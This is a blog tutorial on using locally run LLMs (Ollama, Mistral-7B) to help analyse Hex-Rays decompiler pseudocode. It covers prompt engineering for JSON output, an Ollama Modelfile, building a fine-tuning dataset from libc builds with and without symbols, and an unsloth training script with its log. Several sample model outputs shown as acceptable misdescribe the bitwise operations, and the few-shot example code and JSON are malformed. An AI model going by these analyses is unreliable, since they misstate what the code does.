While these services provide privacy policies that may double pinky swear your data is safe, and they will not use it for training if you opt-out, as a consultant we are often working with a client's data that is under NDA, preventing the usage of these services. Outside of cases where an NDA is in place, a policy won't protect you from platform bugs or provider monitoring that may leak your data or research. We have already seen an example of this with OpenAI publicly confirming they monitor the usage of its service to identify potentially 'evil' usage by bad-actors - https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/

Besides privacy concerns, a few other disadvantages of using a hosted service are:

  • service may go away (outage/sale)
  • modified to prevent malicious use (RE/Exploitation often flagged)
    • potentially resulting monitoring/account ban
  • costs (usually per-token)

Given these hurdles, smaller models that run locally on your own hardware are a promising path to leveraging a LLM without compromising your privacy or an NDA.

Comparisons

To be fair, it is worth pointing out the differences between the hosted LLM offerings and the local versions. The big difference is going to be the size of the training dataset and model parameter size - this can be thought of as the amount of 'knowledge' or data stored within the model, more parameters is going to indicate more 'knowledge' it can reference based on your input. OpenAI does not provide the details of GPT4, GPT3 was +100-billion parameters while GPT3.5's size has not been disclosed, speculation/research/guessing indicates it is much smaller (~22b parameters) - due to fine-tuning and/or other 'secret sauce'. It is speculated that the original GPT4 is in the +100-trillion parameter range. On the other hand, a local model that will run on consumer hardware is going to be in the 2b-70b range, this obviously is a clear disadvantage and is going to result in lower quality responses when compared to a hosted service.

Run Whatcha Brung

The actual size of the model you can run is going to be dependent on how much memory you have available - a decent rule is that the model will occupy 2x the memory of the parameter size: 2b/4gb, 7b/14gb, etc. The main exception to this rule is models that have been modified to use smaller values for stored parameters (quantization). Normally a model will use 16-bit floating point values for parameters; however, by clipping these values to smaller units (8/4-bit) the size can be reduced with minimal to no quality drop, resulting in lower memory usage and faster results.

When it comes to actual speed of results, it comes down to where you are running your inference. The best results are going to come from a recent GPU, ideally 24GB VRAM, meaning NVIDIA 3090 or 4090 - a used 3090 is best for the money for a turnkey solution. The next best setup is going to be an Apple Silicon (arm) Macbook/Studio/etc. - while this may be contentious, it is difficult to match the performance due to the shared memory architecture as you are able to use system ram for compute without a performance hit. While it is possible to run these models from system ram using the CPU on x86/64 machines, there is a performance hit compared to the previous options and results are most likely going to be slow - of course there are caveats here, as with anything you will find cases where highly tuned setups can perform well, in this case we are just considering ease of use and time to get started.

Execution

There are quite a few ways to run models locally, in this case I am using Ollama as it just-works and is fairly batteries-included for most use cases. Ollama provides installers for OSX, Linux, and Windows. Downloading and running a local model is as easy as executing the command ollama run with a model from the registry, the required files will automatically download and enter an interactive 'chat' shell:

% ollama run phi3
pulling manifest
pulling b26e6713dc74... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 2.4 GB
pulling fa8235e5b48f... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 1.1 KB
pulling 542b217f179c... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  148 B
pulling 8dde1baf1db0... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏   78 B
pulling f91db7a2deb9... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  485 B
verifying sha256 digest
writing manifest
removing any unused layers
success
>>> write me a sentence for my blog post about using a local running LLM to assist reversing binary applications.
 "Utilizing a local language model (LLM) tailored for our environment empowers developers to efficiently reverse binary applications, enhancing the debugging and
understanding of complex software systems."

>>> /bye

With the boring up-front details out of the way, we can try and do something useful.

Hammer Looking for Nails

As with any tool, it works best if you have a specific use case you are looking to apply it to, in this case we will be looking at using a model to help analyze Hex-Rays pseudocode. As pseudocode is close to C, most models that have been trained to include code should be able to aid with this task, in this case I have chosen to work with Mistral's 7b model. While there are larger models available that I could run on my hardware, this model has been found to perform quite well for its size and I really wanted to target something that would be relatively performant on lower end hardware.

Prompting Your Way Out

The first step in this process is to understand how well the model will execute a given task and identify the instructions needed to get a useful response. The following prompt was executed:

Analyze the following code and provide a description of what it does. Based on analysis provide updated variable names to replace the current ones.
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The prompt produced the following output:

The given code defines a function named `sub_C385C` that takes an integer argument `a1`. Inside the function, an integer variable `v1` is declared and initialized with the value of the memory location pointed to by `byte_11A2DC` with index `a1`.

Next, a check is made whether the result of calling `sub_CE2BC(0)` is true. If it is, then the value of `v1` is OR-ed with the binary number 4. The resulting value is assigned to a new variable `v2`, which remains undeclared in the given code snippet.

Finally, the original variable `v1` has its bits andered using the bitwise AND operator with the binary number -5 (0xFFFFFFFD) and this result is returned from the function.

To improve the readability of the code, you could consider renaming variables as follows:

```c
unsigned int __fastcall get_value_from_array(int arrayIndex)
{
  unsigned int value;

  value = memoryLocation[arrayIndex]; // Assuming memoryLocation is a properly defined pointer to the memory location pointed to by byte_11A2DC

  if ( checkCondition() )
    value |= 4; // OR with constant 4

  return value & 0xFFFFFFFD; // AND with binary number -5
}

Note: Replace `memoryLocation` and `checkCondition` with actual variable names.

This response is promising looking, but trying to programmatically use this response would be difficult. We can do better by adjusting our prompt to include instructions to return the values in JSON:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The following output was generated:

{
  "function_name": "process_byte_value",
  "comment": "This function takes an integer input, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.",
  "variables": [
    {
      "name": "input",
      "type": "int"
    },
    {
      "name": "byte_value",
      "type": "int"
    },
    {
      "name": "additional_flag",
      "type": "unsigned int"
    },
    {
      "name": "global_array",
      "type": "unsigned int[]",
      "description": "Global array of byte values."
    }
  ]
}

// The function named 'process_byte_value' takes an input integer, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.

unsigned int process_byte_value(int input) {
  int byte_value;
  unsigned int additional_flag = 0;

  if (sub_CE2BC() == true) { // Perform some global flag check here
    additional_flag = 4;
  }

  byte_value = global_array[input]; // Retrieve the corresponding byte value from the global array.

  return (byte_value & 0xFFFFFFF8) | additional_flag; // Perform bitwise operations on the byte_value and additional_flag before returning

Running the same input another time, we get a slight variation on the output

{
  "function_name": "processInputByte",
  "comment": "This function processes an input byte by checking a specific condition and modifying the byte accordingly.",
  "variables": [
    {"name": "inputByte", "type": "int"},
    {"name": "byteMask", "type": "unsigned int"},
    {"name": "conditionMet", "type": "bool"},
    {"name": "processedByte", "type": "unsigned int"}
  ]
}

// This function processes an input byte by checking a specific condition and modifying the byte accordingly.
unsigned int processInputByte(int inputByte) {
  unsigned int processedByte = BYTE_11A2DC[inputByte]; // Load byte from memory location
  bool conditionMet = sub_CE2BC(0); // Check specific condition

  if (conditionMet) {
    processedByte |= 4; // Set specific bit in the byte if condition is met
  }

  return processedByte & 0xFFFFFFFD; // Return the processed byte with certain bits cleared.

Neither of these are ideal as we only want the JSON structure to parse programmatically. By adjusting the prompt we can try to guide the output towards what we are expecting:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The resulting output of this prompt:

{
  "function_name": "processInputByte",
  "comment": "This function takes an input integer and processes a byte from a lookup table based on the input. If a certain condition is met, a bit is set in the output.",
  "variables": [
    {
      "name": "input",
      "description": "The input integer"
    },
    {
      "name": "byteValue",
      "description": "The value of the byte from the lookup table corresponding to the input"
    },
    {
      "name": "outputBitSet",
      "description": "An output variable that has a bit set if the condition is met"
    },
    {
      "name": "lookupTable",
      "description": "A global lookup table used to retrieve the byte value based on the input"
    }
  ]
}

This output is much better, it follows our instructions and produced a valid json structure only; however, if we run the same input again the output varies and returns a slightly different structure, along with details outside the JSON:

{
  "function_name": "process_byte_value",
  "comment": "Processes a byte value from the memory location specified by the input parameter and returns the result.",
  "variables": [
    {
      "name": "input_index",
      "type": "int",
      "description": "The index of the byte value to be processed."
    },
    {
      "name": "processed_value",
      "type": "unsigned int",
      "description": "The processed value of the input byte."
    },
    {
      "name": "is_special_condition_met",
      "type": "int",
      "description": "Flag indicating whether a special condition is met or not."
    }
  ]
}

unsigned int process_byte_value(int input_index)
{
  unsigned int processed_value;
  int is_special_condition_met = sub_CE2BC(0);

  processed_value = byte_11A2DC[input_index];

  if (is_special_condition_met)
    processed_value |= 4;

  return processed_value & 0xFFFFFFFD;
}

We could continue down this path changing the instructions trying to describe what your expected output should be for the given input, but eventually the response will end up deviating in some way breaking the ability to programmatically interface with it. Instead of trying to describe what we want, we can provide an example of what we want it to generate (single/multi-shot prompting). An important thing to remember when dealing with a LLM is that it is predicting the next token/word to output based on current input, by providing an example exchange you are creating a pattern for it to follow. The following revised prompt shows the original prompt modified to provide a single-shot example:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

In this prompt we have provided the instructions as we had previously as well as an example showing what a user would submit and the expected response, followed by the actual code we want analyzed. In this case, the responses match our desired output and are consistent across multiple executions.

Initial generated response:

{
  "function_name": "checkAndModifyByteValue",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC. If the sub_CE2BC function returns true, the value at that index is modified by setting the 4th bit to 1. The function then returns the original value with the 3 highest bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ModifiedByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByteWithBitSet"
    }
  ]
}

Followup executions:

{
  "function_name": "analyze_byte_from_array_and_apply_condition",
  "comment": "This function uses the argument a1 as index into byte_11A2DC, applies a condition using external function sub_CE2BC, and returns a bitwise value based on the result.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "AnalyzedByte"
    },
    {
      "original_name": "v2",
      "new_name": "ConditionalValue"
    }
  ]
}

{
  "function_name": "newFunctionName",
  "comment": "This function takes an integer argument a1, retrieves a value from the memory location byte\\_11A2DC with the index a1, and if the sub\\_CE2BC function returns true, sets a new variable value to the original value orpped with 4. The final return is a bitwise AND of the original value with 0xFFFFFFFD.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ResultVar"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedVar"
    }
  ]
}

{
  "function_name": "checkBitAndModifyByte",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC, checks if sub_CE2BC returns true and modifies the value if it does by setting the 4th bit. It then returns the original value with some bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByte"
    }
  ]
}

The results are decent and do not stray from the format/content we provided in our prompt; we can even include more examples with varying content (multi-shot) if we wanted to. At this point we have a basic prompt that does a specific task that we want relatively well, and the response is parsable (JSON) for automated use.

Light Customization

In the case you have a specific use case (agent/assistant/task) you can configure a version of your underlying pre-trained weights for use through Ollama's Modelfile interface. Ollama's Modelfile provides a lightweight layer to control/configure precomputed weights that can be easily edited and shared with other users. The following shows an example Modelfile configured for our potential Hex-Rays assistant using the prompt we created:

# defines the base pre-computed weights we want to use
FROM mistral:7b-instruct

# template is the format of the interactions with the model
# this is using templating provided by ollama where .System
# and .Prompt  are replaced with the defined variables 
TEMPLATE "{{ .System }}
[INST]
{{ .Prompt }}
[/INST]
"

# SYSTEM is the prompt/text that the model is started with, there are some special values included within this prompt
# that are described below, for now this is where the prompt we developed earlier goes
SYSTEM """<s>[INST]Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:[/INST]
</s>
"""
PARAMETER stop [INST]
PARAMETER stop [/INST]
# these control internal settings within the model to adjust how it behaves
PARAMETER temperature 1.2
PARAMETER top_k 100
PARAMETER top_p 0.09
PARAMETER num_ctx 4096
PARAMETER repeat_last_n 512
PARAMETER repeat_penalty 1.1

To side track for a second, each model has its own prompt format that is required to be used, as well as specific tokens used to indicate what is an instruction as well as start/stop tokens - these values can be found within the Tokenizer configuration file (tokenizer_config.json). For instance, the Mistral 7b-Instruct (https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.1/blob/main/tokenizer_config.json) defines the special values and format we used in our Modelfile:

{
  ...
  ...
  "bos_token": "<s>",
  "chat_template": "{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '[INST] ' + message['content'] + ' [/INST]' }}{% elif message['role'] == 'assistant' %}{{ message['content'] + eos_token + ' ' }}{% else %}{{ raise_exception('Only user and assistant roles are supported!') }}{% endif %}{% endfor %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "</s>",
  ...
  ...
}

Not all models use the same chat_template structure or beginning-of-string (bos_token) or end-of-string (eos_token) values, so it is worth understanding where those formats and tokens come from.

After saving this file to disk (idapal_simple.modelfile), it can be loaded using Ollama:

% ollama create iDAPalSimple -f idapal_simple.modelfile
transferring model data
using existing layer sha256:e8a35b5937a5e6d5c35d1f2a15f161e07eefe5e5bb0a3cdd42998ee79b057730
using existing layer sha256:43070e2d4e532684de521b885f385d0841030efa2b1a20bafb76133a5e1379c1
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
creating new layer sha256:cd2ecea3b680dc83a3d3981ec5efcca96c74f7b5794e7008d8f94522bf024f0d
using existing layer sha256:b4f4d07d73c548c4cd652806db6d567ceff891910db2bf5d5410dcc7e76eeb5a
creating new layer sha256:96a6cc4cffa5e48e458c33efa5301f519279a08eb51ae4a9b33e9ac7abce76d9
writing manifest
success

After creation, the new configuration can be tested by entering the interactive mode via the run command and pasting in the previous code:

% ollama run iDAPalSimple
>>> unsigned int __fastcall sub_C385C(int a1)
... {
...   int v1;
...   unsigned int v2;
...
...   v1 = byte_11A2DC[a1];
...   if ( sub_CE2BC(0) )
...     v2 = v1 | 4;
...   return v1 & 0xFFFFFFFD;
... }
{
"function_name": "new_function_name_C385C",
"comment": "This function uses the argument a1 as an index into byte\_11A2DC. It calls sub\_CE2BC with an argument of 0 and sets v2 to the result of
bitwise OR operation between v1 and 4 if sub\_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between
v1 and 0xFFFFFFFD.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName_C385C"},{"original_name":"v2","new_name":"AnalyzedVarName_C385C_v2"}]
}

The observed response shows that the model works and is using the configured system prompt, returning the expected result after being provided only a code block as input. Ollama also provides an API that can be accessed locally (https://github.com/ollama/ollama/blob/main/docs/api.md), this can be used as seen in the following simple Python client:

import requests,json

def do_analysis(code):
    url = "http://localhost:11434/api/generate"
    headers = {"Content-Type": "application/json"}
    # inform the API we are using our configured model
    payload = {"model": "iDAPalSimple", "prompt": code, "stream": False,"format": "json"}
    res = requests.post(url, headers=headers, json=payload)
    try:
        t = res.json()['response']
        t = json.loads(t)
        return t
    except:
        print(f'error unpacking response')
        print(res.json()['response'])


input_code = '''unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}'''

result = do_analysis(input_code)
print(result)

% python simple_analysis.py
{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}

At this point, the current configuration and simple Python client could be integrated into an IDA Plugin that would work ok, but we can do better.

Fine-Tuning - step one: draw two circles

The initial training and creation of model weights that are released is a computationally expensive process, while follow on fine-tuning training is much less expensive to conduct. Fine-tuning provides a path to give a pre-trained model a "personality" by introducing new data and/or example interactions that would be considered "ideal" behavior when interacting with a user. The process is iterative and can be conducted multiple times until the model matches the expected behavior when interacting with a user.

While our small local model is never going to compete with a large, hosted service, fine-tuning can be used to boost its performance and compete on specific tasks or knowledge domains. To carry out a fine tune of a model you need complete the following steps:

  • Identify a target knowledge domain
  • Construct a dataset for your target domain
  • Train against your dataset
  • Evaluate trained model

For this task, the knowledge domain is already known - we want to fine tune a model that can be used to aid with analysis of Hex-Rays pseudocode. The next step is constructing a dataset, this is the difficult part. At a high level the dataset that needs to be built will be made of "instruction-following" examples, for instance the following shows what this would look like:

{
  "instruction":"Assist the user with a helpful process for drawing an animal.",
  "input":"How do I draw an Owl?",
  "output":"Drawing an Owl is simple, first draw some circles, then you draw the rest of the Owl."
},
{
  "instruction":"Assist the user with an idea for an animal to draw and provide them instructions.",
  "input":"",
  "output":"There are many animals you could choose to draw, my favorite is the Owl. An Owl is a fairly basic animal to draw, first draw some circles, then you draw the rest of the Owl"
}

These examples provide two types of instruction-following dataset entries. The first example starts by specifying the instruction to be followed with a matching input (user input) and finally the ideal output (generated result). The second example only provides an instruction along with an example output - the second example is useful for generative only responses that do not require user input, this type is not that useful for our current task but was included as an example. A dataset entry that would be useful for our task would look like the following:

{
  "instruction":"Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.",
  "input":"unsigned int __fastcall sub_C385C(int a1)\n {\n int v1;\n unsigned int v2;\n\n v1 = byte_11A2DC[a1];\n if ( sub_CE2BC(0) )\n v2 = v1 | 4;\n return v1 & 0xFFFFFFFD;\n }",
  "output":"{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}"
}

As a side note, following this exact formatting in JSON will allow for using the datasets library from Hugging Face and is going to be a common format.

With the exact format needed for training identified, the next problem is that we really need thousands of these examples, ideally with high quality responses. I had considered trying to manually create the required dataset using tree-sitter to rewrite valid code with generic variable names while sourcing the function description from documentation, this sounded painful, and I wanted the machine to do the hard work for me. Looking at earlier work done by Stanford for the Alpaca project (https://crfm.stanford.edu/2023/03/13/alpaca.html) I decided to try the same style of approach. The basic idea of this workflow is to use a LLM to build your dataset based on a smaller dataset, or in this case an incomplete dataset and train against that:

After some noodling around I came up with the following high-level process:

  • compile libc with full debug/symbol information
  • load the compiled libraries into IDA and export all functions Hex-Rays output into individual files by address
  • strip the compiled libraries and repeat the previous step, exporting all functions Hex-Rays output into a new set of files

This process creates two directories with matching files:

/symbol/0x2d7f4.c
/stripp/0x2d7f4.c

In this case the file /symbol/0x2d7f4.c contains:

void __fastcall setname(int category, const char *name)
{
  char *v3; // r0

  v3 = (char *)nl_global_locale.__names[category];
  if ( v3 != name )
  {
    if ( v3 != "C" )
      j___GI___libc_free(v3);
    nl_global_locale.__names[category] = name;
  }
}

And the file /stripp/0x2d7f4.c contains:

char *__fastcall sub_2D7F4(int a1, char **a2)
{
  char *result; // r0

  result = (char *)off_170C10[a1 + 16];
  if ( result != (char *)a2 )
  {
    if ( result != "C" )
      result = (char *)j_free();
    off_170C10[a1 + 16] = a2;
  }
  return result;
}

With the two sets of data, the next stage of processing is to generate the dataset records. At a high-level this process looks like the following:

  • using the previously created mistral-7b configuration, query using the symbol/debug Hex-Rays output to get a reasonable quality output
  • create a dataset entry by combining the matching STRIPPED Hex-Rays output with the generated output from the symbol/debug Hex-Rays
  • iterate over all the files until complete

After completing this step we have a large completed instruction-following dataset we can use to fine tune against.

Heavy Customization

There are quite a few options when it comes to carrying out a fine tune of a LLM, at the time of this research project I chose to use unsloth. The following projects are also popular and most likely more batteries-included:

I went with unsloth for a few reasons, the main reason being underlying code has been tuned to provide a large performance increase (speed/memory usage), also it seemed less likely to abstract or hide parts of the training process that may be useful to see or understand. The unsloth project also provides a Jupyter notebook that can be executed on the Google Colab free tier if you do not have hardware (works perfectly!) - I ended up conducting training on a local Linux host with an NVIDIA 3090. To give an idea of performance, the free Colab tier took 21 minutes while my 3090 executed the same training in 7 minutes. Refer to the unsloth repository for install instructions, at the time of this project the installation using conda looked like the following:

conda create --name unsloth_env python=3.10
conda activate unsloth_env
conda install cudatoolkit xformers bitsandbytes pytorch pytorch-cuda=12.1 -c pytorch -c nvidia -c xformers -c conda-forge -y
pip install "unsloth[conda] @ git+https://github.com/unslothai/unsloth.git"

The script used for training was adopted from the examples provided by unsloth, the script uses Hugging Face's Supervised Fine-tuning Trainer (SFT) from the Transformer Reinforcement Learning (TRL) library:

from unsloth import FastLanguageModel
import torch,sys

model = sys.argv[1]
steps = int(sys.argv[2])
training_data = sys.argv[3]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 32, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128 - r/rank is how strong you want your training to apply
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha = 16, # alpha is a multiplier against r/rank 
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized
    use_gradient_checkpointing = True,
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files=training_data, split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)


from trl import SFTTrainer
from transformers import TrainingArguments

trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset,
    dataset_text_field = "text",
    max_seq_length = max_seq_length,
    dataset_num_proc = 2,
    packing = False, # Can make training 5x faster for short sequences.
    args = TrainingArguments(
        per_device_train_batch_size = 4,
        gradient_accumulation_steps = 4,
        warmup_steps = 5,
        max_steps = steps,
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50
    ),
)

gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

# execute the actual training
trainer_stats = trainer.train()

used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory         /max_memory*100, 3)
lora_percentage = round(used_memory_for_lora/max_memory*100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

model.save_pretrained(f"lora_model_{steps}") # Local saving

# Just LoRA adapters
if True: model.save_pretrained_merged(f"model_{steps}", tokenizer, save_method = "lora",)

# Save to q4_k_m GGUF
if True: model.save_pretrained_gguf(f"model_{steps}", tokenizer, quantization_method = "q4_k_m")

The script also defines the following items:

output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50

This configuration will save a copy of the fine-tuned weights every 50 steps to a directory outputs - this is helpful for a few reasons. The first being if an error occurs at some point (crash/power/etc.) you have checkpoints you can restart your training from, the second being it allows you to effectively evaluate how well your training is working by comparing each saved checkpoint. While it may seem at first, more steps are better, this is going to be dependent on how large your dataset is and which settings you have configured - more is not always better.

Running this script to fine tune mistral-7b-instruct for 100 steps using the dataset we created would look like the following example output:

$ python training/train.py unsloth/mistral-7b-instruct-v0.2-bnb-4bit 100 ./dataset.json
==((====))==  Unsloth: Fast Mistral patching release 2024.2
   \\   /|    GPU: NVIDIA GeForce RTX 3090. Max memory: 23.691 GB. Platform = Linux.
O^O/ \_/ \    Pytorch: 2.2.0. CUDA = 8.6. CUDA Toolkit = 12.1.
\        /    Bfloat16 = TRUE. Xformers = 0.0.24. FA = False.
 "-____-"     Free Apache license: http://github.com/unslothai/unsloth
/mnt/new/unsloth/lib/python3.10/site-packages/transformers/quantizers/auto.py:155: UserWarning: You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading already has a `quantization_config` attribute. The `quantization_config` from the model will be used.
  warnings.warn(warning_msg)
Unsloth 2024.2 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.
Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
GPU = NVIDIA GeForce RTX 3090. Max memory = 23.691 GB.
4.676 GB of memory reserved.
==((====))==  Unsloth - 2x faster free finetuning | Num GPUs = 1
   \\   /|    Num examples = 2,897 | Num Epochs = 3
O^O/ \_/ \    Batch size per device = 4 | Gradient Accumulation steps = 4
\        /    Total batch size = 16 | Total steps = 500
 "-____-"     Number of trainable parameters = 83,886,080
{'loss': 1.4802, 'grad_norm': 1.6030948162078857, 'learning_rate': 4e-05, 'epoch': 0.01}
{'loss': 1.4201, 'grad_norm': 1.4948327541351318, 'learning_rate': 8e-05, 'epoch': 0.01}
{'loss': 1.5114, 'grad_norm': 1.6689960956573486, 'learning_rate': 0.00012, 'epoch': 0.02}
{'loss': 1.1665, 'grad_norm': 0.9258238673210144, 'learning_rate': 0.00016, 'epoch': 0.02}
{'loss': 0.9282, 'grad_norm': 0.6133134961128235, 'learning_rate': 0.0002, 'epoch': 0.03}
{'loss': 0.9292, 'grad_norm': 0.6610234975814819, 'learning_rate': 0.0001995959595959596, 'epoch': 0.03}
{'loss': 0.7517, 'grad_norm': 0.4809339940547943, 'learning_rate': 0.0001991919191919192, 'epoch': 0.04}
{'loss': 0.7554, 'grad_norm': 0.6171303987503052, 'learning_rate': 0.00019878787878787878, 'epoch': 0.04}
{'loss': 0.606, 'grad_norm': 0.564286470413208, 'learning_rate': 0.00019838383838383837, 'epoch': 0.05}
{'loss': 0.6274, 'grad_norm': 0.414183109998703, 'learning_rate': 0.000197979797979798, 'epoch': 0.06}
